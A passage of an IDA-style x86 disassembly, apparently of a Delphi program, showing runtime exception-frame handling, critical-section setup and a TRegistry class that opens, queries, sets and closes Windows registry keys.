mov eax, edi
call sub_40013708
mov eax, esi
call sub_40003CE8
loc_40013DE9: ; CODE XREF: sub_40013D90+47�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_40013DC6
loc_40013DEF: ; CODE XREF: sub_40013D90+34�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013E0E
loc_40013DFC: ; CODE XREF: sub_40013D90+7C�j
mov eax, ds:dword_4001F2E0
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40013E07: ; DATA XREF: sub_40013D90+22�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013DFC
; ---------------------------------------------------------------------------
loc_40013E0E: ; CODE XREF: sub_40013D90+11�j
; sub_40013D90+76�j
; DATA XREF: ...
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_40013D90 endp
; =============== S U B R O U T I N E =======================================
sub_40013E14 proc near ; CODE XREF: sub_400191F8+1A�p
push offset dword_4001F2E4
call sub_400065E0 ; InitializeCriticalSection
push offset dword_40013E44
push 0
push 0FFFFFFFFh
push 0
call sub_40006508 ; CreateEventA
mov ds:dword_4001F2CC, eax
cmp ds:dword_4001F2CC, 0
jnz short locret_40013E41
call sub_4000C410
locret_40013E41: ; CODE XREF: sub_40013E14+26�j
retn
sub_40013E14 endp
; ---------------------------------------------------------------------------
align 4
dword_40013E44 dd 0
; =============== S U B R O U T I N E =======================================
sub_40013E48 proc near ; CODE XREF: sub_40013ED4+7D�p
push offset dword_4001F2E4
call sub_40006518 ; RtlDeleteCriticalSection
mov eax, ds:dword_4001F2CC
push eax
call sub_400064F0 ; CloseHandle
retn
sub_40013E48 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013E60 proc near ; CODE XREF: sub_40013ED4+2D�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, ds:dword_4001F2D4
call sub_40013AA4
mov edi, eax
xor eax, eax
push ebp
push offset loc_40013EB5
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [edi+8]
dec ebx
test ebx, ebx
jl short loc_40013E9D
inc ebx
xor esi, esi
loc_40013E8B: ; CODE XREF: sub_40013E60+3B�j
mov edx, esi
mov eax, edi
call sub_400137FC
call sub_40003CE8
inc esi
dec ebx
jnz short loc_40013E8B
loc_40013E9D: ; CODE XREF: sub_40013E60+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013EBC
loc_40013EAA: ; CODE XREF: sub_40013E60+5A�j
mov eax, ds:dword_4001F2D4
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40013EB5: ; DATA XREF: sub_40013E60+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013EAA
; ---------------------------------------------------------------------------
loc_40013EBC: ; CODE XREF: sub_40013E60+54�j
; DATA XREF: sub_40013E60+45�o
mov eax, ds:dword_4001F2D4
call sub_40003CE8
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40013E60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013ECC proc near ; DATA XREF: sub_40013ED4+69�o
; sub_400191F8+1F�o
call sub_40013510
retn
sub_40013ECC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013ED4 proc near ; DATA XREF: .text:40018398�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40013F78
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F2D0
jnz short loc_40013F6A
mov eax, ds:dword_4001E7F8
call sub_40013510
mov eax, ds:dword_4001F2C8
mov edx, [eax]
call dword ptr [edx+14h]
call sub_40013E60
xor edx, edx
xor eax, eax
call sub_40013CE4
mov eax, offset dword_4001F2E0
call sub_4000C970
call sub_40006428
lea eax, [eax+8]
call sub_4000C970
mov eax, offset dword_4001F2D8
call sub_4000C970
mov eax, offset dword_4001F2C8
call sub_40006204
mov eax, offset sub_40013ECC
call sub_4000609C
mov eax, offset dword_4001AA94
call sub_4000C970
call sub_40013E48
mov eax, offset dword_4001F2DC
call sub_4000C970
mov eax, offset dword_4001F2C8
call sub_40006204
loc_40013F6A: ; CODE XREF: sub_40013ED4+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013F7F
loc_40013F77: ; CODE XREF: sub_40013ED4+A9�j
retn
; ---------------------------------------------------------------------------
loc_40013F78: ; DATA XREF: sub_40013ED4+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013F77
; ---------------------------------------------------------------------------
loc_40013F7F: ; CODE XREF: sub_40013ED4:loc_40013F77�j
; DATA XREF: sub_40013ED4+9E�o
pop ebp
retn
sub_40013ED4 endp
; ---------------------------------------------------------------------------
align 4
off_40013F84 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF68�o
dd 0FF92h, 0FFFFFFFFh, 1
dword_40013F94 dd 30h, 0FFFFFFFFh, 1, 31h ; .data:4001AA9C�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013FA4 proc near ; DATA XREF: .text:400183A0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40013FE0
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F2FC
jnz short loc_40013FD2
mov eax, offset off_4001AA98
mov ecx, 2
mov edx, ds:off_40001000
call sub_40005314
loc_40013FD2: ; CODE XREF: sub_40013FA4+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013FE7
loc_40013FDF: ; CODE XREF: sub_40013FA4+41�j
retn
; ---------------------------------------------------------------------------
loc_40013FE0: ; DATA XREF: sub_40013FA4+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013FDF
; ---------------------------------------------------------------------------
loc_40013FE7: ; CODE XREF: sub_40013FA4:loc_40013FDF�j
; DATA XREF: sub_40013FA4+36�o
pop ebp
retn
sub_40013FA4 endp
; ---------------------------------------------------------------------------
align 4
off_40013FEC dd offset dword_40014038 ; DATA XREF: sub_400140B4+19�r
; sub_4001464C+50�r ...
dd 7 dup(0)
dd offset dword_40014038
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40014038 dd 65524512h, 74736967h, 78457972h, 74706563h, 906E6F69h
; DATA XREF: .text:off_40013FEC�o
; .text:4001400C�o
off_4001404C dd offset dword_40014098 ; DATA XREF: .itext:400194A4�r
; .itext:40019505�r
dd 2 dup(0)
dd offset dword_40014098
dd 4 dup(0)
dd offset word_400140AA
dd 1Ch
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40014190
dword_40014098 dd 0Eh, 10000h ; .text:40014058�o
db 2 dup(0)
dd offset off_40001000
dw 10h
db 2 dup(0)
word_400140AA dw 5409h ; DATA XREF: .text:4001406C�o
dd 69676552h, 79727473h
; =============== S U B R O U T I N E =======================================
sub_400140B4 proc near ; CODE XREF: sub_400145D4+62�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov [esp+0Ch+var_C], ebx
mov [esp+0Ch+var_8], 0Bh
push esp
push 0
mov ecx, off_4001AF7C
mov dl, 1
mov eax, ds:off_40013FEC
call sub_4000B128
call sub_400042E4
pop ecx
pop edx
pop ebx
retn
sub_400140B4 endp
; =============== S U B R O U T I N E =======================================
sub_400140E0 proc near ; CODE XREF: sub_40014250+2F�p
; sub_40014374+2C�p
push ebx
mov ebx, eax
test ebx, ebx
jz short loc_400140F0
cmp byte ptr [ebx], 5Ch
jnz short loc_400140F0
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_400140F0: ; CODE XREF: sub_400140E0+5�j
; sub_400140E0+A�j
mov al, 1
pop ebx
retn
sub_400140E0 endp
; =============== S U B R O U T I N E =======================================
sub_400140F4 proc near ; CODE XREF: sub_4001464C+14�p
dec al
jz short loc_40014106
dec al
jz short loc_4001410C
dec al
jz short loc_40014112
dec al
jz short loc_40014118
jmp short loc_4001411E
; ---------------------------------------------------------------------------
loc_40014106: ; CODE XREF: sub_400140F4+2�j
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_4001410C: ; CODE XREF: sub_400140F4+6�j
mov eax, 2
retn
; ---------------------------------------------------------------------------
loc_40014112: ; CODE XREF: sub_400140F4+A�j
mov eax, 4
retn
; ---------------------------------------------------------------------------
loc_40014118: ; CODE XREF: sub_400140F4+E�j
mov eax, 3
retn
; ---------------------------------------------------------------------------
loc_4001411E: ; CODE XREF: sub_400140F4+10�j
xor eax, eax
retn
sub_400140F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40014124 proc near ; CODE XREF: sub_4001452C+3F�p
; sub_400146B4+5E�p
cmp eax, 1
jnz short loc_4001412C
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_4001412C: ; CODE XREF: sub_40014124+3�j
cmp eax, 2
jnz short loc_40014135
mov al, 2
jmp short locret_40014149
; ---------------------------------------------------------------------------
loc_40014135: ; CODE XREF: sub_40014124+B�j
cmp eax, 4
jnz short loc_4001413E
mov al, 3
jmp short locret_40014149
; ---------------------------------------------------------------------------
loc_4001413E: ; CODE XREF: sub_40014124+14�j
cmp eax, 3
jnz short loc_40014147
mov al, 4
jmp short locret_40014149
; ---------------------------------------------------------------------------
loc_40014147: ; CODE XREF: sub_40014124+1D�j
xor eax, eax
locret_40014149: ; CODE XREF: sub_40014124+F�j
; sub_40014124+18�j ...
retn
sub_40014124 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001414C proc near ; CODE XREF: .itext:400194A9�p
; .itext:4001950A�p
push ebx
push esi
test dl, dl
jz short loc_4001415A
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4001415A: ; CODE XREF: sub_4001414C+4�j
mov ebx, edx
mov esi, eax
mov edx, 80000001h
mov eax, esi
call sub_400141EC
mov dword ptr [esi+18h], 0F003Fh
mov byte ptr [esi+0Ch], 1
mov eax, esi
test bl, bl
jz short loc_4001418A
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4001418A: ; CODE XREF: sub_4001414C+2D�j
mov eax, esi
pop esi
pop ebx
retn
sub_4001414C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40014190 proc near ; DATA XREF: .text:40014094�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov eax, esi
call sub_400141BC
mov edx, ebx
and dl, 0FCh
mov eax, esi
call sub_40003CD8
test bl, bl
jle short loc_400141B9
mov eax, esi
call sub_40003F80
loc_400141B9: ; CODE XREF: sub_40014190+20�j
pop esi
pop ebx
retn
sub_40014190 endp
; =============== S U B R O U T I N E =======================================
sub_400141BC proc near ; CODE XREF: sub_40014190+D�p
; sub_400141EC+22�p ...
push ebx
mov ebx, eax
mov eax, [ebx+4]
test eax, eax
jz short loc_400141E8
cmp byte ptr [ebx+0Ch], 0
jnz short loc_400141D2
push eax
call sub_400064D0 ; RegFlushKey
loc_400141D2: ; CODE XREF: sub_400141BC+E�j
mov eax, [ebx+4]
push eax
call sub_400064C0 ; RegCloseKey
xor eax, eax
mov [ebx+4], eax
lea eax, [ebx+10h]
call sub_40004884
loc_400141E8: ; CODE XREF: sub_400141BC+8�j
pop ebx
retn
sub_400141BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400141EC proc near ; CODE XREF: sub_4001414C+19�p
; .itext:400194B7�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, [ebx+8]
cmp esi, eax
jz short loc_40014213
cmp byte ptr [ebx+14h], 0
jz short loc_40014209
push eax
call sub_400064C0 ; RegCloseKey
mov byte ptr [ebx+14h], 0
loc_40014209: ; CODE XREF: sub_400141EC+11�j
mov [ebx+8], esi
mov eax, ebx
call sub_400141BC
loc_40014213: ; CODE XREF: sub_400141EC+B�j
pop esi
pop ebx
retn
sub_400141EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40014218 proc near ; CODE XREF: sub_40014250+EA�p
; sub_40014374+AF�p ...
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_400141BC
mov [ebx+4], esi
lea eax, [ebx+10h]
mov edx, edi
call sub_400048D8
pop edi
pop esi
pop ebx
retn
sub_40014218 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001423C proc near ; CODE XREF: sub_40014250+74�p
; sub_40014250+A8�p ...
mov ecx, [eax+4]
test ecx, ecx
jz short loc_40014247
test dl, dl
jnz short loc_4001424B
loc_40014247: ; CODE XREF: sub_4001423C+5�j
mov eax, [eax+8]
retn
; ---------------------------------------------------------------------------
loc_4001424B: ; CODE XREF: sub_4001423C+9�j
mov eax, ecx
retn
sub_4001423C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40014250 proc near ; CODE XREF: .itext:400194C5�p
; .itext:40019526�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
xor ebx, ebx
mov [ebp+var_4], ebx
mov [ebp+var_5], cl
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40014355
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
mov edx, ebx
call sub_4000491C
mov eax, [ebp+var_4]
call sub_400140E0
mov ebx, eax
test bl, bl
jnz short loc_4001429C
lea eax, [ebp+var_4]
mov ecx, 1
mov edx, 1
call sub_40004DE8
loc_4001429C: ; CODE XREF: sub_40014250+38�j
xor eax, eax
mov [ebp+var_C], eax
cmp [ebp+var_5], 0
jz short loc_400142AD
cmp [ebp+var_4], 0
jnz short loc_400142D7
loc_400142AD: ; CODE XREF: sub_40014250+55�j
lea eax, [ebp+var_C]
push eax
mov eax, [esi+18h]
push eax
push 0
mov eax, [ebp+var_4]
call sub_40004D48
push eax
mov edx, ebx
mov eax, esi
call sub_4001423C
push eax
call sub_400064D8 ; RegOpenKeyExA
test eax, eax
setz [ebp+var_6]
jmp short loc_40014309
; ---------------------------------------------------------------------------
loc_400142D7: ; CODE XREF: sub_40014250+5B�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
push 0
mov eax, [esi+18h]
push eax
push 0
push 0
push 0
mov eax, [ebp+var_4]
call sub_40004D48
push eax
mov edx, ebx
mov eax, esi
call sub_4001423C
push eax
call sub_400064C8 ; RegCreateKeyExA
test eax, eax
setz [ebp+var_6]
loc_40014309: ; CODE XREF: sub_40014250+85�j
cmp [ebp+var_6], 0
jz short loc_4001433F
cmp dword ptr [esi+4], 0
setnz al
test bl, al
jz short loc_40014332
push dword ptr [esi+10h]
push offset dword_40014370
push [ebp+var_4]
lea eax, [ebp+var_4]
mov edx, 3
call sub_40004C08
loc_40014332: ; CODE XREF: sub_40014250+C8�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_C]
mov eax, esi
call sub_40014218
loc_4001433F: ; CODE XREF: sub_40014250+BD�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001435C
loc_4001434C: ; CODE XREF: sub_40014250+10A�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40014355: ; DATA XREF: sub_40014250+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001434C
; ---------------------------------------------------------------------------
loc_4001435C: ; CODE XREF: sub_40014250+104�j
; DATA XREF: sub_40014250+F7�o
movzx eax, [ebp+var_6]
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40014250 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40014370 dd 5Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40014374 proc near
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_4], ecx
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4001450E
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
mov edx, ebx
call sub_4000491C
mov eax, [ebp+var_4]
call sub_400140E0
mov ebx, eax
test bl, bl
jnz short loc_400143BD
lea eax, [ebp+var_4]
mov ecx, 1
mov edx, 1
call sub_40004DE8
loc_400143BD: ; CODE XREF: sub_40014374+35�j
xor eax, eax
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push 20019h
push 0
mov eax, [ebp+var_4]
call sub_40004D48
push eax
mov edx, ebx
mov eax, esi
call sub_4001423C
push eax
call sub_400064D8 ; RegOpenKeyExA
test eax, eax
setz [ebp+var_5]
cmp [ebp+var_5], 0
jz short loc_4001442D
mov dword ptr [esi+18h], 20019h
cmp dword ptr [esi+4], 0
setnz al
test bl, al
jz short loc_4001441B
push dword ptr [esi+10h]
push offset dword_40014528
push [ebp+var_4]
lea eax, [ebp+var_4]
mov edx, 3
call sub_40004C08
loc_4001441B: ; CODE XREF: sub_40014374+8D�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_C]
mov eax, esi
call sub_40014218
jmp loc_400144F8
; ---------------------------------------------------------------------------
loc_4001442D: ; CODE XREF: sub_40014374+7B�j
lea eax, [ebp+var_C]
push eax
push 20009h
push 0
mov eax, [ebp+var_4]
call sub_40004D48
push eax
mov edx, ebx
mov eax, esi
call sub_4001423C
push eax
call sub_400064D8 ; RegOpenKeyExA
test eax, eax
setz [ebp+var_5]
cmp [ebp+var_5], 0
jz short loc_40014495
mov dword ptr [esi+18h], 20009h
cmp dword ptr [esi+4], 0
setnz al
test bl, al
jz short loc_40014486
push dword ptr [esi+10h]
push offset dword_40014528
push [ebp+var_4]
lea eax, [ebp+var_4]
mov edx, 3
call sub_40004C08
loc_40014486: ; CODE XREF: sub_40014374+F8�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_C]
mov eax, esi
call sub_40014218
jmp short loc_400144F8
; ---------------------------------------------------------------------------
loc_40014495: ; CODE XREF: sub_40014374+E6�j
lea eax, [ebp+var_C]
push eax
push 1
push 0
mov eax, [ebp+var_4]
call sub_40004D48
push eax
mov edx, ebx
mov eax, esi
call sub_4001423C
push eax
call sub_400064D8 ; RegOpenKeyExA
test eax, eax
setz [ebp+var_5]
cmp [ebp+var_5], 0
jz short loc_400144F8
mov dword ptr [esi+18h], 1
cmp dword ptr [esi+4], 0
setnz al
test bl, al
jz short loc_400144EB
push dword ptr [esi+10h]
push offset dword_40014528
push [ebp+var_4]
lea eax, [ebp+var_4]
mov edx, 3
call sub_40004C08
loc_400144EB: ; CODE XREF: sub_40014374+15D�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_C]
mov eax, esi
call sub_40014218
loc_400144F8: ; CODE XREF: sub_40014374+B4�j
; sub_40014374+11F�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40014515
loc_40014505: ; CODE XREF: sub_40014374+19F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4001450E: ; DATA XREF: sub_40014374+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40014505
; ---------------------------------------------------------------------------
loc_40014515: ; CODE XREF: sub_40014374+199�j
; DATA XREF: sub_40014374+18C�o
movzx eax, [ebp+var_5]
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40014374 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 1
dword_40014528 dd 5Ch ; sub_40014374+FD�o ...
; =============== S U B R O U T I N E =======================================
sub_4001452C proc near ; CODE XREF: sub_4001457C+F�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebp, ecx
mov edi, edx
mov esi, eax
mov eax, ebp
xor ecx, ecx
mov edx, 8
call sub_40003580
lea eax, [ebp+4]
push eax
push 0
lea eax, [esp+1Ch+var_14]
push eax
push 0
mov eax, edi
call sub_40004D48
push eax
mov eax, [esi+4]
push eax
call sub_400064E0 ; RegQueryValueExA
test eax, eax
setz bl
mov eax, [esp+14h+var_14]
call sub_40014124
mov [ebp+0], al
mov eax, ebx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4001452C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001457C proc near ; CODE XREF: sub_400145D4+F�p
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
mov edx, esi
mov eax, ebx
call sub_4001452C
test al, al
jz short loc_4001459A
mov eax, [esp+10h+var_C]
jmp short loc_4001459D
; ---------------------------------------------------------------------------
loc_4001459A: ; CODE XREF: sub_4001457C+16�j
or eax, 0FFFFFFFFh
loc_4001459D: ; CODE XREF: sub_4001457C+1C�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_4001457C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400145A4 proc near ; CODE XREF: .itext:400194F7�p
; .itext:40019558�p
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov ebx, edi
test ebx, ebx
jz short loc_400145B9
sub ebx, 4
mov ebx, [ebx]
loc_400145B9: ; CODE XREF: sub_400145A4+E�j
inc ebx
push ebx
push 1
mov eax, edi
call sub_40004D48
mov ecx, eax
mov edx, ebp
mov eax, esi
call sub_4001464C
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400145A4 endp
; =============== S U B R O U T I N E =======================================
sub_400145D4 proc near
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov edi, ecx
mov ebp, edx
mov esi, eax
mov edx, ebp
mov eax, esi
call sub_4001457C
mov ebx, eax
test ebx, ebx
jle short loc_4001463D
mov eax, edi
mov ecx, ebx
xor edx, edx
call sub_40004974
push ebx
lea eax, [esp+18h+var_14]
push eax
mov eax, [edi]
call sub_40004D48
mov ecx, eax
mov edx, ebp
mov eax, esi
call sub_400146B4
cmp [esp+14h+var_14], 1
jz short loc_4001461D
cmp [esp+14h+var_14], 2
jnz short loc_40014634
loc_4001461D: ; CODE XREF: sub_400145D4+41�j
mov eax, [edi]
call sub_40004D48
call sub_4000815C
mov edx, eax
mov eax, edi
call sub_40004F74
jmp short loc_40014644
; ---------------------------------------------------------------------------
loc_40014634: ; CODE XREF: sub_400145D4+47�j
mov eax, ebp
call sub_400140B4
jmp short loc_40014644
; ---------------------------------------------------------------------------
loc_4001463D: ; CODE XREF: sub_400145D4+18�j
mov eax, edi
call sub_40004884
loc_40014644: ; CODE XREF: sub_400145D4+5E�j
; sub_400145D4+67�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400145D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001464C proc near ; CODE XREF: sub_400145A4+26�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov edi, edx
mov ebx, eax
movzx eax, [ebp+arg_0]
call sub_400140F4
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+var_4]
push eax
push esi
push 0
mov eax, edi
call sub_40004D48
push eax
mov eax, [ebx+4]
push eax
call sub_400064E8 ; RegSetValueExA
test eax, eax
jz short loc_400146AB
mov [ebp+var_C], edi
mov [ebp+var_8], 0Bh
lea eax, [ebp+var_C]
push eax
push 0
mov ecx, off_4001AFCC
mov dl, 1
mov eax, ds:off_40013FEC
call sub_4000B128
call sub_400042E4
loc_400146AB: ; CODE XREF: sub_4001464C+39�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_4001464C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400146B4 proc near ; CODE XREF: sub_400145D4+38�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
mov [ebp+var_4], eax
lea eax, [ebp+arg_4]
push eax
push edi
lea eax, [ebp+var_4]
push eax
push 0
mov eax, esi
call sub_40004D48
push eax
mov eax, [ebx+4]
push eax
call sub_400064E0 ; RegQueryValueExA
test eax, eax
jz short loc_4001470C
mov [ebp+var_C], esi
mov [ebp+var_8], 0Bh
lea eax, [ebp+var_C]
push eax
push 0
mov ecx, off_4001B0D4
mov dl, 1
mov eax, ds:off_40013FEC
call sub_4000B128
call sub_400042E4
loc_4001470C: ; CODE XREF: sub_400146B4+32�j
mov ebx, [ebp+arg_4]
mov eax, [ebp+var_4]
call sub_40014124
mov edx, [ebp+arg_0]
mov [edx], al
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_400146B4 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40014730 dd 30h, 0FFFFFFFFh, 1, 31h ; .data:4001AAA4�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40014740 proc near ; DATA XREF: .text:400183A8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4001477C
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F300
jnz short loc_4001476E
mov eax, offset off_4001AAA0
mov ecx, 2
mov edx, ds:off_40001000
call sub_40005314
loc_4001476E: ; CODE XREF: sub_40014740+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40014783
loc_4001477B: ; CODE XREF: sub_40014740+41�j
retn
; ---------------------------------------------------------------------------
loc_4001477C: ; DATA XREF: sub_40014740+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001477B
; ---------------------------------------------------------------------------
loc_40014783: ; CODE XREF: sub_40014740:loc_4001477B�j
; DATA XREF: sub_40014740+36�o
pop ebp
retn
sub_40014740 endp
; ---------------------------------------------------------------------------
align 4
off_40014788 dd offset dword_4001478C ; DATA XREF: .itext:40019378�r
dword_4001478C dd 43540601h, 726F6C6Fh, 4, 0FFFFFF80h, 408D7Fh
; DATA XREF: .text:off_40014788�o
off_400147A0 dd offset dword_400147A4 ; DATA XREF: .itext:4001938C�r
dword_400147A4 dd 46540C01h, 43746E6Fh, 73726168h, 17465h, 0FF000000h
; DATA XREF: .text:off_400147A0�o
dd 90000000h
off_400147BC dd offset dword_40014808 ; DATA XREF: .text:4001484C�o
; .itext:40019303�o ...
dd 6 dup(0)
dd offset dword_40014808
dd offset dword_40014810
dd 24h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_400148CC
dword_40014808 dd 0FFFF0001h ; .text:400147D8�o
dd offset nullsub_7
dword_40014810 dd 65525410h, 72756F73h, 614D6563h, 6567616Eh, 408D72h
; DATA XREF: .text:400147DC�o
off_40014824 dd offset dword_40014870 ; DATA XREF: .itext:4001932D�o
dd 6 dup(0)
dd offset dword_40014870
dd offset dword_40014878
dd 24h
dd offset off_400147BC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_400148CC
dword_40014870 dd 0FFFF0001h ; .text:40014840�o
dd offset loc_4001490C
dword_40014878 dd 72425415h, 52687375h, 756F7365h, 4D656372h, 67616E61h
; DATA XREF: .text:40014844�o
dd 0C08B7265h, 0D2845653h, 0C4830874h, 0F692E8F0h, 0DA8BFFFEh
dd 8966F08Bh, 468D204Eh, 31E85008h, 8BFFFF1Dh, 74DB84C6h
dd 0F6CEE80Fh, 8F64FFFEh, 5, 0CC48300h, 5B5EC68Bh, 408DC3h
; =============== S U B R O U T I N E =======================================
sub_400148CC proc near ; DATA XREF: .text:40014804�o
; .text:4001486C�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
lea eax, [esi+8]
push eax
call sub_40006518 ; RtlDeleteCriticalSection
test bl, bl
jle short loc_400148EB
mov eax, esi
call sub_40003F80
loc_400148EB: ; CODE XREF: sub_400148CC+16�j
pop esi
pop ebx
retn
sub_400148CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400148F0 proc near ; CODE XREF: sub_40014F8C+3F�p
; sub_400151D0+1A�p ...
add eax, 8
push eax
call sub_40006520 ; RtlEnterCriticalSection
retn
sub_400148F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
